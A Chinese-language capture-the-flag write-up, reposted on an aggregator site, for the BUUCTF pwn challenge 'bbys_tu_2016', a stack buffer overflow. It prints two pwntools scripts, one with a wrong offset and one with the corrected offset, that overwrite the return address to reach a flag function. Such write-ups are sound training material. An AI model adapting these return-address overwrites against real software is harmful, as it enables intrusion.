[BUUCTF-pwn]——bbys_tu_2016
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——bbys_tu_2016
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——bbys_tu_2016
簡單的棧溢出,不過竟然是esp尋址,害的孩子找了好久還是要動態調試 一般地址會誤差八個字節
error exploit
from pwn import * #p = remote('node3.buuoj.cn',28360) p = process('./bbys_tu_2016') gdb.attach(p, "b *0x080485ED") flag = 0x0804856D payload = 'a' * (0xc + 4) + p32(flag) p.sendline(payload) p.interactive()right exploit
from pwn import * #p = remote('node3.buuoj.cn',28360) p = process('./bbys_tu_2016') gdb.attach(p, "b *0x080485ED") flag = 0x0804856D payload = 'a' * (0x14 + 4) + p32(flag) p.sendline(payload) p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——bbys_tu_2016的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——picoct
- 下一篇: [BUUCTF-pwn]——inndy_